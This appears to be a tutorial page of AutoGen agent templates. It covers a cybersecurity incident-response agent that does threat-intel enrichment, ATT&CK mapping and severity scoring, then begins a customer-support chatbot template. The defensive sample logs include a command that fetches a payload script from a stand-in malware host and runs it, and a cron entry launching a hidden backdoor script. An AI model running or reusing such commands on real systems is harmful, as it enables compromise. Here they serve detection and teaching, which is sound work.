                    "x-apikey": VIRUSTOTAL_API_KEY
                }

                # A timeout keeps one slow lookup from stalling the whole analysis
                response = requests.get(url, headers=headers, timeout=10)
491 if response.status_code == 200:
492 data = response.json().get("data", {})
493 attributes = data.get("attributes", {})
494 stats = attributes.get("last_analysis_stats", {})
495
496 malicious_count = stats.get("malicious", 0)
497 suspicious_count = stats.get("suspicious", 0)
498 total_engines = sum(stats.values())
499
500 # Calculate reputation score (0-100)
501 if total_engines > 0:
502 reputation_score = ((malicious_count + suspicious_count) / total_engines) * 100
503 else:
504 reputation_score = 0
505
506 # Get tags from popular threat categories
507 tags = []
508 popular_threats = attributes.get("popular_threat_classification", {}).get("suggested_threat_label", "")
509 if popular_threats:
510 tags.append(popular_threats)
511
512 reputation_data.update({
513 "malicious": malicious_count > 0,
514 "reputation_score": reputation_score,
515 "tags": tags,
516 "source": "VirusTotal",
517 "detection_ratio": f"{malicious_count}/{total_engines}",
518 "file_type": attributes.get("type_description", "Unknown"),
519 "first_seen": attributes.get("first_submission_date", None),
520 "last_seen": attributes.get("last_analysis_date", None)
521 })
522
            elif indicator_type in ["domain", "url"]:
                # Check domain/URL reputation using VirusTotal
                if indicator_type == "domain":
                    url = f"https://www.virustotal.com/api/v3/domains/{indicator}"
                else:
                    # The v3 API identifies a URL by its URL-safe base64 encoding without
                    # padding, not by a percent-encoded copy of the URL.
                    import base64  # local import; can be moved to the module imports
                    url_id = base64.urlsafe_b64encode(indicator.encode()).decode().strip("=")
                    url = f"https://www.virustotal.com/api/v3/urls/{url_id}"

                headers = {
                    "x-apikey": VIRUSTOTAL_API_KEY
                }

                # A timeout keeps one slow lookup from stalling the whole analysis
                response = requests.get(url, headers=headers, timeout=10)
537 if response.status_code == 200:
538 data = response.json().get("data", {})
539 attributes = data.get("attributes", {})
540 stats = attributes.get("last_analysis_stats", {})
541
542 malicious_count = stats.get("malicious", 0)
543 suspicious_count = stats.get("suspicious", 0)
544 total_engines = sum(stats.values())
545
546 # Calculate reputation score (0-100)
547 if total_engines > 0:
548 reputation_score = ((malicious_count + suspicious_count) / total_engines) * 100
549 else:
550 reputation_score = 0
551
552 # Get categories assigned by threat intelligence
553 categories = attributes.get("categories", {})
554 tags = list(set(categories.values()))
555
556 reputation_data.update({
557 "malicious": malicious_count > 0,
558 "reputation_score": reputation_score,
559 "tags": tags,
560 "source": "VirusTotal",
561 "detection_ratio": f"{malicious_count}/{total_engines}",
562 "last_seen": attributes.get("last_analysis_date", None)
563 })
564
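        except Exception as e:
            reputation_data["error"] = str(e)

        # Cache only lookups that completed without an exception,
        # so a transient failure can be retried on the next call
        if "error" not in reputation_data:
            self.threat_intel_cache[cache_key] = reputation_data

        return reputation_data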
572
573 def enrich_indicators(self, indicators: Dict[str, List[str]]) -> Dict[str, List[Dict[str, Any]]]:
574 """
575 Enrich indicators with threat intelligence data.
576
577 Args:
578 indicators: Dictionary of indicators by type
579
580 Returns:
581 Dictionary of enriched indicators by type
582 """
583 enriched = {}
584
585 for ind_type, ind_list in indicators.items():
586 enriched[ind_type] = []
587
588 # Map indicator types to check_indicator_reputation types
589 type_mapping = {
590 "ips": "ip",
591 "domains": "domain",
592 "urls": "url",
593 "hashes": "hash"
594 }
595
596 if ind_type in type_mapping:
597 for indicator in ind_list:
598 reputation = self.check_indicator_reputation(
599 indicator,
600 type_mapping[ind_type]
601 )
602 enriched[ind_type].append(reputation)
603 else:
604 # For types without reputation check, just add the raw indicators
605 enriched[ind_type] = [{"indicator": ind, "type": ind_type} for ind in ind_list]
606
607 return enriched
608
609 def identify_attack_techniques(self, logs: List[Dict[str, Any]], enriched_indicators: Dict[str, List[Dict[str, Any]]]) -> List[Dict[str, Any]]:
610 """
611 Identify potential MITRE ATT&CK techniques from logs and indicators.
612
613 Args:
614 logs: Parsed log data
615 enriched_indicators: Enriched indicators from threat intelligence
616
617 Returns:
618 List of identified attack techniques with evidence
619 """
620 # Use OpenAI to identify potential attack techniques
621 # Prepare the prompt with log examples and enriched indicators
622
623 # Select a sample of logs (to avoid token limits)
624 log_sample = logs[:20] if len(logs) > 20 else logs
625 log_sample_text = json.dumps(log_sample, indent=2)
626
627 # Prepare enriched indicators summary
628 indicators_summary = ""
629 malicious_indicators = []
630
631 for ind_type, ind_list in enriched_indicators.items():
632 # Filter to include only malicious indicators
633 malicious = [ind for ind in ind_list if ind.get("malicious", False)]
634 if malicious:
635 malicious_indicators.extend(malicious)
636 indicators_summary += f"\n{ind_type.upper()}:\n"
637 for ind in malicious[:5]: # Limit to 5 indicators per type
638 indicators_summary += f"- {ind['indicator']} (Score: {ind['reputation_score']}, Tags: {', '.join(ind['tags'])})\n"
639
640 if len(malicious) > 5:
641 indicators_summary += f" ... and {len(malicious) - 5} more\n"
642
        # Prepare the prompt. JSON mode (response_format below) returns a JSON object,
        # so the prompt asks for an object with a "techniques" array rather than a bare array.
        # The "tactic" field is requested because assess_severity() reads it.
        prompt = f"""Analyze the following security logs and malicious indicators to identify potential MITRE ATT&CK techniques:

LOG SAMPLE:
{log_sample_text}

MALICIOUS INDICATORS:
{indicators_summary}

Based on these logs and indicators, identify the most likely MITRE ATT&CK techniques being used.
For each technique, provide:
1. The technique ID and name ("id", "name")
2. The ATT&CK tactic it belongs to ("tactic")
3. Confidence level ("confidence": high, medium, or low)
4. Specific evidence from the logs or indicators ("evidence")
5. Explanation of why this technique matches the evidence ("explanation")

Format the response as a JSON object with a single key "techniques" whose value is an array of techniques.
"""

        try:
            response = client.chat.completions.create(
                model="gpt-4-turbo",
                messages=[
                    {"role": "system", "content": "You are a cybersecurity expert specialized in mapping security incidents to the MITRE ATT&CK framework."},
                    {"role": "user", "content": prompt}
                ],
                temperature=0.2,
                response_format={"type": "json_object"}
            )

            # Extract and parse the response
            attack_techniques = json.loads(response.choices[0].message.content)

            # Unwrap the container object to get the techniques array
            if isinstance(attack_techniques, dict):
                attack_techniques = attack_techniques.get("techniques", [])

            # Callers expect a list, so discard any other shape
            return attack_techniques if isinstance(attack_techniques, list) else []

        except Exception as e:
            print(f"Error identifying attack techniques: {e}")
            return []
685
686 def assess_severity(
687 self,
688 attack_techniques: List[Dict[str, Any]],
689 enriched_indicators: Dict[str, List[Dict[str, Any]]]
690 ) -> Dict[str, Any]:
691 """
692 Assess the severity of the security incident.
693
694 Args:
695 attack_techniques: Identified ATT&CK techniques
696 enriched_indicators: Enriched indicators from threat intelligence
697
698 Returns:
699 Dictionary with severity assessment
700 """
701 # Count high confidence techniques
702 high_confidence_techniques = sum(1 for t in attack_techniques if t.get("confidence", "").lower() == "high")
703
704 # Count malicious indicators
705 malicious_count = sum(
706 sum(1 for ind in ind_list if ind.get("malicious", False))
707 for ind_type, ind_list in enriched_indicators.items()
708 )
709
710 # Initial severity score calculation (0-100)
711 severity_score = 0
712
713 # Factor 1: Number of high confidence techniques (up to 40 points)
714 technique_score = min(high_confidence_techniques * 10, 40)
715 severity_score += technique_score
716
717 # Factor 2: Number of malicious indicators (up to 30 points)
718 indicator_score = min(malicious_count * 5, 30)
719 severity_score += indicator_score
720
721 # Factor 3: Types of techniques identified (up to 30 points)
722 # Check for high-severity techniques
723 high_severity_tactics = ["Impact", "Exfiltration", "Command and Control", "Privilege Escalation"]
724
725 tactic_score = 0
726 tactics_found = set()
727
728 for technique in attack_techniques:
729 tactic = technique.get("tactic", "")
730 if tactic:
731 tactics_found.add(tactic)
732
733 # Add extra points for high-severity tactics
734 if tactic in high_severity_tactics:
735 tactic_score += 5
736
737 # Add points for diversity of tactics (technique spread)
738 tactic_score += len(tactics_found) * 3
739 tactic_score = min(tactic_score, 30)
740
741 severity_score += tactic_score
742
743 # Determine severity level based on score
744 severity_level = "Informational"
745 if severity_score >= 80:
746 severity_level = "Critical"
747 elif severity_score >= 60:
748 severity_level = "High"
749 elif severity_score >= 40:
750 severity_level = "Medium"
751 elif severity_score >= 20:
752 severity_level = "Low"
753
754 return {
755 "severity_level": severity_level,
756 "severity_score": severity_score,
757 "factors": {
758 "high_confidence_techniques": high_confidence_techniques,
759 "malicious_indicators": malicious_count,
760 "tactics_identified": list(tactics_found),
761 "technique_score": technique_score,
762 "indicator_score": indicator_score,
763 "tactic_score": tactic_score
764 }
765 }
766
767 def generate_remediation_steps(
768 self,
769 attack_techniques: List[Dict[str, Any]],
770 severity_assessment: Dict[str, Any]
771 ) -> List[Dict[str, Any]]:
772 """
773 Generate remediation steps based on identified attack techniques.
774
775 Args:
776 attack_techniques: Identified ATT&CK techniques
777 severity_assessment: Severity assessment
778
779 Returns:
780 List of remediation steps
781 """
782 # Use OpenAI to generate remediation steps
783 # Prepare the prompt with attack techniques and severity
784 techniques_text = json.dumps(attack_techniques, indent=2)
785 severity_text = json.dumps(severity_assessment, indent=2)
786
        # JSON mode (response_format below) returns a JSON object, so the prompt asks for
        # an object with a "remediation_steps" array rather than a bare array.
        prompt = f"""Based on the following identified attack techniques and severity assessment, provide detailed remediation steps:

ATTACK TECHNIQUES:
{techniques_text}

SEVERITY ASSESSMENT:
{severity_text}

For each identified attack technique, provide:
1. Immediate containment actions
2. Eradication steps to remove the threat
3. Recovery procedures
4. Long-term prevention measures

Consider the severity when prioritizing actions. Provide specific, actionable steps rather than general advice.
Format the response as a JSON object with a single key "remediation_steps" whose value is an array of remediation steps, each labeled with its phase (containment, eradication, recovery, prevention).
"""

        try:
            response = client.chat.completions.create(
                model="gpt-4-turbo",
                messages=[
                    {"role": "system", "content": "You are a cybersecurity incident response expert specialized in developing remediation plans."},
                    {"role": "user", "content": prompt}
                ],
                temperature=0.3,
                response_format={"type": "json_object"}
            )

            # Extract and parse the response
            remediation_steps = json.loads(response.choices[0].message.content)

            # Unwrap the container object to get the remediation array
            if isinstance(remediation_steps, dict):
                remediation_steps = remediation_steps.get("remediation_steps", [])

            # Callers expect a list, so discard any other shape
            return remediation_steps if isinstance(remediation_steps, list) else []

        except Exception as e:
            print(f"Error generating remediation steps: {e}")
            return []
828
829 def analyze_incident(self, log_data: str, log_type: str = "generic", additional_context: str = None) -> Dict[str, Any]:
830 """
831 Analyze security incident data using the agent team.
832
833 Args:
834 log_data: Raw log data as string
835 log_type: Type of log data
836 additional_context: Additional context about the environment or incident
837
838 Returns:
839 Dictionary with comprehensive incident analysis
840 """
841 # Create a unique incident ID
842 incident_id = f"INC-{uuid.uuid4().hex[:8]}"
843
        # Create group chat for agent collaboration
        groupchat = autogen.GroupChat(
            agents=[
                self.user_proxy,
                self.threat_detector,
                self.forensic_investigator,
                self.threat_intel_analyst,
                self.incident_responder,
                self.documentation_specialist
            ],
            messages=[],
            max_round=15
        )

        # The manager uses an LLM to pick the next speaker, so it needs a config.
        # Assumption: self.llm_config is set in __init__, as it is for the agents.
        manager = autogen.GroupChatManager(groupchat=groupchat, llm_config=self.llm_config)
859
860 # Process log data
861 parsed_logs = self.parse_log_data(log_data, log_type)
862
863 # Extract indicators
864 indicators = self.extract_indicators(parsed_logs)
865
866 # Enrich indicators with threat intelligence
867 enriched_indicators = self.enrich_indicators(indicators)
868
869 # Identify attack techniques
870 attack_techniques = self.identify_attack_techniques(parsed_logs, enriched_indicators)
871
872 # Assess severity
873 severity = self.assess_severity(attack_techniques, enriched_indicators)
874
875 # Generate remediation steps
876 remediation_steps = self.generate_remediation_steps(attack_techniques, severity)
877
878 # Prepare summary of findings for the agents
879 malicious_indicators_summary = ""
880 for ind_type, ind_list in enriched_indicators.items():
881 malicious = [ind for ind in ind_list if ind.get("malicious", False)]
882 if malicious:
883 malicious_indicators_summary += f"\n{ind_type.upper()} ({len(malicious)}):\n"
884 for ind in malicious[:5]: # Limit to 5 indicators per type for readability
885 tags = ", ".join(ind.get('tags', [])[:3]) # Limit tags to first 3
886 malicious_indicators_summary += f"- {ind['indicator']} (Score: {ind.get('reputation_score', 'N/A')}, Tags: {tags})\n"
887
888 if len(malicious) > 5:
889 malicious_indicators_summary += f" ... and {len(malicious) - 5} more\n"
890
891 # Prepare attack techniques summary
892 techniques_summary = ""
893 for i, technique in enumerate(attack_techniques[:5], 1): # Limit to 5 techniques for readability
894 technique_id = technique.get("technique_id", "Unknown")
895 name = technique.get("name", "Unknown")
896 confidence = technique.get("confidence", "Unknown")
897
898 techniques_summary += f"{i}. {technique_id} - {name} (Confidence: {confidence})\n"
899
900 # Add brief evidence
901 evidence = technique.get("evidence", "")
902 if isinstance(evidence, str) and evidence:
903 evidence_brief = evidence[:150] + "..." if len(evidence) > 150 else evidence
904 techniques_summary += f" Evidence: {evidence_brief}\n"
905
906 if len(attack_techniques) > 5:
907 techniques_summary += f"... and {len(attack_techniques) - 5} more techniques\n"
908
        # Build the optional context section outside the f-string: a backslash
        # inside an f-string expression is a SyntaxError before Python 3.12.
        context_section = f"ADDITIONAL CONTEXT:\n{additional_context}" if additional_context else ""

        # Generate initial prompt for the agent team
        analysis_prompt = f"""
        SECURITY INCIDENT ANALYSIS
        Incident ID: {incident_id}
        Log Type: {log_type}
        Severity: {severity['severity_level']} (Score: {severity['severity_score']}/100)

        I need your collaborative analysis of this security incident. Initial automated analysis has identified:

        POTENTIAL ATTACK TECHNIQUES:
        {techniques_summary}

        MALICIOUS INDICATORS:
        {malicious_indicators_summary}

        LOG SAMPLE (first 5 entries):
        {json.dumps(parsed_logs[:5], indent=2)}

        {context_section}

        I need the team to work together to provide:
        1. ThreatDetector: Analyze the logs for additional suspicious patterns and refine the attack identification
        2. ForensicInvestigator: Reconstruct the incident timeline and determine the scope of compromise
        3. ThreatIntelAnalyst: Provide context on the threat actors and their TTPs based on the indicators
        4. IncidentResponder: Create a detailed remediation plan with prioritized actions
        5. DocumentationSpecialist: Compile all findings into a comprehensive incident report

        The SecurityAnalyst (me) will coordinate your work. Please be specific, thorough, and actionable in your analysis.
        """
938
939 # Start the group chat
940 result = self.user_proxy.initiate_chat(
941 manager,
942 message=analysis_prompt
943 )
944
        # Extract the final report from the group chat transcript.
        # groupchat.messages records every message with the speaker in "name".
        final_report = None
        for message in reversed(groupchat.messages):
            content = message.get("content") or ""
            if "DocumentationSpecialist" in (message.get("name") or "") and content:
                final_report = content
                break

        if not final_report:
            # Fall back to the last substantial agent response if no clear report
            for message in reversed(groupchat.messages):
                content = message.get("content") or ""
                if message.get("name") != self.user_proxy.name and len(content) > 500:
                    final_report = content
                    break
958
959 # Compile the complete analysis results
960 analysis_result = {
961 "incident_id": incident_id,
962 "timestamp": datetime.datetime.now().isoformat(),
963 "log_type": log_type,
964 "severity": severity,
965 "indicators": {
966 "total": {
967 k: len(v) for k, v in indicators.items() if v
968 },
969 "malicious": {
970 k: len([ind for ind in v if ind.get("malicious", False)])
971 for k, v in enriched_indicators.items() if v
972 },
973 "details": enriched_indicators
974 },
975 "attack_techniques": attack_techniques,
976 "remediation_steps": remediation_steps,
977 "report": final_report,
978 "metadata": {
979 "log_count": len(parsed_logs),
980 "analysis_version": "1.0"
981 }
982 }
983
984 return analysis_result
985
986# Example usage
987if __name__ == "__main__":
988 # Create incident response agent
989 ir_agent = CybersecurityIncidentResponseAgent()
990
991 # Example log data (simplified for demonstration)
992 example_logs = """
993Apr 15 12:34:56 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49812 ssh2
994Apr 15 12:35:01 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49813 ssh2
995Apr 15 12:35:05 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49814 ssh2
996Apr 15 12:35:10 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49815 ssh2
997Apr 15 12:35:15 server sshd[12345]: Failed password for invalid user admin from 203.0.113.1 port 49816 ssh2
998Apr 15 12:35:30 server sshd[12346]: Accepted password for user root from 203.0.113.1 port 49820 ssh2
999Apr 15 12:36:00 server sudo: root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/bin/bash -c wget http://malware.example.com/payload.sh
1000Apr 15 12:36:10 server sudo: root : TTY=pts/0 ; PWD=/root ; USER=root ; COMMAND=/bin/bash payload.sh
1001Apr 15 12:37:05 server kernel: [1234567.123456] Firewall: Blocked outbound connection to 198.51.100.1:8080
1002Apr 15 12:38:30 server crontab[12347]: (root) BEGIN EDIT (root)
1003Apr 15 12:38:45 server crontab[12347]: (root) END EDIT (root)
1004Apr 15 12:39:00 server cron[12348]: (root) CMD (/usr/bin/python3 /tmp/.hidden/backdoor.py)
1005 """
1006
1007 # Analyze the incident
1008 analysis = ir_agent.analyze_incident(
1009 log_data=example_logs,
1010 log_type="syslog",
1011 additional_context="Linux server running in AWS. Contains customer data and is publicly accessible."
1012 )
1013
1014 # Print a summary of the results
1015 print(f"Incident ID: {analysis['incident_id']}")
1016 print(f"Severity: {analysis['severity']['severity_level']} (Score: {analysis['severity']['severity_score']})")
1017 print("\nMalicious Indicators:")
1018 for ind_type, count in analysis['indicators']['malicious'].items():
1019 if count > 0:
1020 print(f"- {ind_type}: {count}")
1021
1022 print("\nAttack Techniques:")
1023 for technique in analysis['attack_techniques'][:3]: # Show first 3
1024 print(f"- {technique.get('technique_id', 'Unknown')}: {technique.get('name', 'Unknown')}")
1025
1026 print("\nReport Excerpt:")
1027 if analysis['report']:
1028 report_excerpt = analysis['report'][:500] + "..." if len(analysis['report']) > 500 else analysis['report']
1029 print(report_excerpt)
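
The summary loop in `analyze_incident` reads specific keys from each enriched indicator (`indicator`, `malicious`, `reputation_score`, `tags`). The sketch below isolates that loop so the expected input shape is easy to see. The function name `summarize_malicious_indicators`, the indicator type names, and the sample values are illustrative assumptions, not part of the template.

```python
from typing import Any, Dict, List


def summarize_malicious_indicators(
    enriched: Dict[str, List[Dict[str, Any]]],
    max_per_type: int = 5,
) -> str:
    """Build a per-type summary of malicious indicators for the agent prompt."""
    lines: List[str] = []
    for ind_type, ind_list in enriched.items():
        malicious = [ind for ind in ind_list if ind.get("malicious", False)]
        if not malicious:
            continue
        lines.append(f"{ind_type.upper()} ({len(malicious)}):")
        for ind in malicious[:max_per_type]:
            tags = ", ".join(ind.get("tags", [])[:3])  # keep at most 3 tags
            score = ind.get("reputation_score", "N/A")
            lines.append(f"- {ind['indicator']} (Score: {score}, Tags: {tags})")
        if len(malicious) > max_per_type:
            lines.append(f"  ... and {len(malicious) - max_per_type} more")
    return "\n".join(lines)


# Hypothetical sample data; in the template these values would come from
# enrich_indicators(), whose exact output is not shown here.
sample = {
    "ip_addresses": [
        {"indicator": "203.0.113.1", "malicious": True,
         "reputation_score": 92, "tags": ["brute-force", "ssh"]},
        {"indicator": "198.51.100.1", "malicious": False,
         "reputation_score": 10, "tags": []},
    ],
    "domains": [],
}

print(summarize_malicious_indicators(sample))
```

Indicator types with no malicious entries are skipped entirely, which keeps the prompt short when most lookups come back clean.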

Usage Example:

python
from cybersecurity_incident_response_agent import CybersecurityIncidentResponseAgent

# Initialize the agent
ir_agent = CybersecurityIncidentResponseAgent()

# Example firewall logs
firewall_logs = """
timestamp=2023-10-15T08:12:45Z src=192.168.1.105 dst=103.45.67.89 proto=TCP sport=49123 dport=445 action=BLOCK reason=policy
timestamp=2023-10-15T08:12:47Z src=192.168.1.105 dst=103.45.67.89 proto=TCP sport=49124 dport=445 action=BLOCK reason=policy
timestamp=2023-10-15T08:13:01Z src=192.168.1.106 dst=103.45.67.89 proto=TCP sport=51234 dport=445 action=BLOCK reason=policy
timestamp=2023-10-15T09:23:15Z src=103.45.67.89 dst=192.168.1.50 proto=TCP sport=3389 dport=49562 action=ALLOW reason=policy
timestamp=2023-10-15T09:25:03Z src=192.168.1.50 dst=185.147.22.55 proto=TCP sport=49621 dport=443 action=ALLOW reason=policy
timestamp=2023-10-15T09:26:45Z src=192.168.1.50 dst=185.147.22.55 proto=TCP sport=49622 dport=443 action=ALLOW reason=policy
timestamp=2023-10-15T09:27:12Z src=192.168.1.50 dst=185.147.22.55 proto=TCP sport=49623 dport=443 action=ALLOW reason=policy
timestamp=2023-10-15T10:45:13Z src=192.168.1.50 dst=172.16.10.5 proto=TCP sport=49755 dport=139 action=ALLOW reason=policy
timestamp=2023-10-15T10:45:15Z src=192.168.1.50 dst=172.16.10.5 proto=TCP sport=49756 dport=445 action=ALLOW reason=policy
timestamp=2023-10-15T10:46:02Z src=192.168.1.50 dst=172.16.10.6 proto=TCP sport=49802 dport=445 action=ALLOW reason=policy
"""

# Additional context about the environment
additional_context = """
This is a corporate network with approximately 200 endpoints. The environment includes:
- Windows workstations and servers
- Office 365 cloud services
- VPN for remote access
- Sensitive financial data stored on internal file servers
- PCI compliance requirements
"""

# Analyze the incident
analysis = ir_agent.analyze_incident(
    log_data=firewall_logs,
    log_type="firewall",
    additional_context=additional_context
)

# Print key findings
print(f"INCIDENT ID: {analysis['incident_id']}")
print(f"SEVERITY: {analysis['severity']['severity_level']} (Score: {analysis['severity']['severity_score']})")

print("\nKEY INDICATORS:")
for ind_type, count in analysis['indicators']['malicious'].items():
    if count > 0:
        print(f"- {ind_type}: {count} malicious out of {analysis['indicators']['total'].get(ind_type, 0)} total")

print("\nATTACK TECHNIQUES:")
for technique in analysis['attack_techniques']:
    print(f"- {technique.get('technique_id', 'N/A')}: {technique.get('name', 'N/A')} ({technique.get('confidence', 'N/A')})")

print("\nTOP REMEDIATION STEPS:")
# The model decides the exact JSON shape, so accept either a dict keyed by
# phase or a list of such dicts. An empty list (the error path) prints nothing.
remediation = analysis['remediation_steps']
phase_groups = [remediation] if isinstance(remediation, dict) else [g for g in remediation if isinstance(g, dict)]
for group in phase_groups:
    for phase, steps in group.items():
        if not isinstance(steps, list):
            steps = [steps]
        print(f"\n{phase.upper()}:")
        for i, step in enumerate(steps[:3], 1):  # Show top 3 steps per phase
            print(f"{i}. {step}")
        if len(steps) > 3:
            print(f"   ... and {len(steps) - 3} more steps")

print("\nFULL REPORT AVAILABLE IN ANALYSIS RESULT")

This Cybersecurity Incident Response agent template demonstrates key security automation patterns:

  1. Specialized Analysis: Different security specialties (forensics, threat intelligence, remediation) working together
  2. Threat Intelligence Integration: Automated enrichment of indicators with reputation data
  3. MITRE ATT&CK Mapping: Structured identification of attack techniques
  4. Risk-Based Prioritization: Severity assessment to focus on the most critical issues
  5. Actionable Remediation: Clear, prioritized steps for different incident response phases
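
Risk-based prioritization in this template comes down to mapping a capped numeric score to a named level. The sketch below pulls that mapping out on its own. The thresholds (80, 60, 40, 20) are the ones used in `assess_severity`; the function name `severity_level` and the table-driven form are illustrative choices, not the template's own code.

```python
def severity_level(score: int) -> str:
    """Map a 0-100 severity score to a level using the template's thresholds."""
    # Ordered from highest to lowest so the first match wins.
    thresholds = [(80, "Critical"), (60, "High"), (40, "Medium"), (20, "Low")]
    for minimum, level in thresholds:
        if score >= minimum:
            return level
    return "Informational"


for score in (95, 60, 45, 20, 5):
    print(score, severity_level(score))
```

Keeping the thresholds in one ordered table makes it straightforward to tune them per environment without touching the control flow.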

AI Customer Support Automation (Intelligent Chatbot & Sentiment Analysis)

This agent template handles customer support interactions: it answers inquiries, routes complex issues to specialist agents, and analyzes customer sentiment. Resolved tickets feed back into the knowledge base, so responses can improve over time.

Core Capabilities:

  • Natural conversation handling with context awareness
  • Knowledge base integration for accurate responses
  • Sentiment analysis and customer satisfaction tracking
  • Ticket categorization and priority assignment
  • Specialist routing for complex issues
  • Continuous improvement through feedback loops
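
Specialist routing can be sketched as a lookup from the inquiry category to an agent name, with a couple of escalation overrides. The category labels match those requested in `categorize_inquiry`, and the agent names match the team defined in the implementation. The routing table itself, the function name `route_inquiry`, and both escalation rules are assumptions made for illustration.

```python
from typing import Any, Dict

# Hypothetical routing table. "account" goes to billing because the
# BillingSpecialist is described as handling payment and account issues.
CATEGORY_TO_AGENT = {
    "technical": "TechnicalSpecialist",
    "billing": "BillingSpecialist",
    "account": "BillingSpecialist",
    "product": "ProductSpecialist",
    "complaint": "SatisfactionSpecialist",
    "general": "FrontDeskAgent",
}


def route_inquiry(categorization: Dict[str, Any], sentiment: Dict[str, Any]) -> str:
    """Pick the name of the agent that should handle an inquiry."""
    # Assumed rule: urgent inquiries are coordinated by the manager.
    if categorization.get("priority") == "urgent":
        return "SupportManager"
    # Assumed rule: angry customers go to the satisfaction specialist first.
    if sentiment.get("emotion_label") == "angry":
        return "SatisfactionSpecialist"
    # Unknown or missing categories fall back to the front desk.
    category = categorization.get("primary_category")
    return CATEGORY_TO_AGENT.get(category, "FrontDeskAgent")


print(route_inquiry(
    {"primary_category": "billing", "priority": "medium"},
    {"emotion_label": "neutral"},
))
```

Returning an agent name rather than an agent object keeps the rule testable without constructing any AutoGen agents.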

Architecture:

Customer Support Automation Architecture

Implementation Example:

python
1# customer_support_agent.py
2import os
3import json
4import datetime
5import uuid
6import pandas as pd
7import numpy as np
8import autogen
9import openai
10import re
11import logging
12from typing import Dict, List, Any, Optional, Union, Tuple
13
14# Configure API keys and settings
15OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")
16
17# Initialize OpenAI client
18client = openai.OpenAI(api_key=OPENAI_API_KEY)
19
20# Configure logging
21logging.basicConfig(
22 level=logging.INFO,
23 format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
24 handlers=[
25 logging.FileHandler("customer_support.log"),
26 logging.StreamHandler()
27 ]
28)
29
30logger = logging.getLogger("customer_support_agent")
31
32class CustomerSupportAgent:
33 """
34 An AI-powered customer support agent that handles customer inquiries,
35 analyzes sentiment, and routes complex issues to specialists.
36 """
37
38 def __init__(self, config=None):
39 """
40 Initialize the Customer Support Agent.
41
42 Args:
43 config: Optional configuration dictionary with settings
44 """
45 self.config = config or {}
46
47 # Knowledge base file path
48 self.knowledge_base_path = self.config.get("knowledge_base_path", "knowledge_base.json")
49
50 # Load knowledge base if it exists, otherwise create an empty one
51 self.knowledge_base = self._load_knowledge_base()
52
53 # Customer conversation history
54 self.conversation_history = {}
55
56 # Load conversation history if available
57 self.history_path = self.config.get("history_path", "conversation_history.json")
58 if os.path.exists(self.history_path):
59 try:
60 with open(self.history_path, 'r') as f:
61 self.conversation_history = json.load(f)
62 except Exception as e:
63 logger.error(f"Error loading conversation history: {e}")
64
65 # Set up agent configuration
66 self.llm_config = {
67 "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
68 "temperature": 0.7,
69 "timeout": 60
70 }
71
72 # Create the agent team
73 self._create_agent_team()
74
75 # Ticket system
76 self.tickets = {}
77
78 # Load tickets if available
79 self.tickets_path = self.config.get("tickets_path", "support_tickets.json")
80 if os.path.exists(self.tickets_path):
81 try:
82 with open(self.tickets_path, 'r') as f:
83 self.tickets = json.load(f)
84 except Exception as e:
85 logger.error(f"Error loading tickets: {e}")
86
87 def _load_knowledge_base(self) -> Dict:
88 """
89 Load the knowledge base from a JSON file.
90
91 Returns:
92 Dictionary containing the knowledge base
93 """
94 if os.path.exists(self.knowledge_base_path):
95 try:
96 with open(self.knowledge_base_path, 'r') as f:
97 return json.load(f)
98 except Exception as e:
99 logger.error(f"Error loading knowledge base: {e}")
100
101 # If file doesn't exist or has errors, initialize with empty structure
102 return {
103 "products": {},
104 "faqs": {},
105 "troubleshooting": {},
106 "policies": {},
107 "response_templates": {}
108 }
109
110 def save_knowledge_base(self):
111 """Save the knowledge base to a JSON file."""
112 try:
113 with open(self.knowledge_base_path, 'w') as f:
114 json.dump(self.knowledge_base, f, indent=2)
115 logger.info("Knowledge base saved successfully")
116 except Exception as e:
117 logger.error(f"Error saving knowledge base: {e}")
118
119 def _create_agent_team(self):
120 """Create the team of specialized agents for customer support."""
121
122 # 1. Front Desk Agent - First point of contact
123 self.front_desk_agent = autogen.AssistantAgent(
124 name="FrontDeskAgent",
125 system_message="""You are a friendly and helpful front desk customer support agent.
126 You are the first point of contact for all customer inquiries.
127
128 Your responsibilities:
129 1. Greet customers in a friendly manner
130 2. Identify the customer's core issue or request
131 3. Provide immediate help for simple questions
132 4. Collect relevant information for complex issues
133 5. Create a positive first impression
134
135 Always be polite, empathetic, and patient. Use a conversational tone while remaining professional.
136 Ask clarifying questions when necessary to better understand the customer's needs.
137 If you can resolve the issue immediately with your knowledge, do so. Otherwise, acknowledge
138 the customer's concern and prepare to route them to a specialist.""",
139 llm_config=self.llm_config
140 )
141
142 # 2. Technical Support Specialist - For technical problems
143 self.technical_specialist = autogen.AssistantAgent(
144 name="TechnicalSpecialist",
145 system_message="""You are an expert technical support specialist with deep knowledge
146 of all our products, services, and common technical issues.
147
148 Your responsibilities:
149 1. Diagnose technical problems based on customer descriptions
150 2. Provide step-by-step troubleshooting guidance
151 3. Explain technical concepts in user-friendly language
152 4. Document technical issues for knowledge base updates
153 5. Identify when escalation to engineering is needed
154
155 Focus on clear, accurate instructions. Walk customers through troubleshooting steps one at a time.
156 Verify each step is completed before moving to the next. Be patient with customers who may not be
157 technically savvy. When providing solutions, briefly explain the cause of the issue to help customers
158 understand and potentially prevent similar problems in the future.""",
159 llm_config=self.llm_config
160 )
161
162 # 3. Billing Specialist - For payment and account issues
163 self.billing_specialist = autogen.AssistantAgent(
164 name="BillingSpecialist",
165 system_message="""You are an expert billing and account specialist with comprehensive knowledge
166 of our billing systems, subscription plans, and payment processes.
167
168 Your responsibilities:
169 1. Resolve billing inquiries and payment issues
170 2. Explain charges, fees, and subscription details
171 3. Guide customers through payment processes
172 4. Assist with account status questions
173 5. Handle refund and credit inquiries
174
175 Be thorough and precise when discussing financial matters. Always verify account information
176 before providing specific details. Explain billing concepts clearly and without technical jargon.
177 Show empathy when customers are frustrated about billing issues while remaining factual and
178 solution-oriented. Ensure compliance with financial regulations in all interactions.""",
179 llm_config=self.llm_config
180 )
181
182 # 4. Product Specialist - For product-specific questions
183 self.product_specialist = autogen.AssistantAgent(
184 name="ProductSpecialist",
185 system_message="""You are an expert product specialist with in-depth knowledge of all
186 our products, features, comparisons, and use cases.
187
188 Your responsibilities:
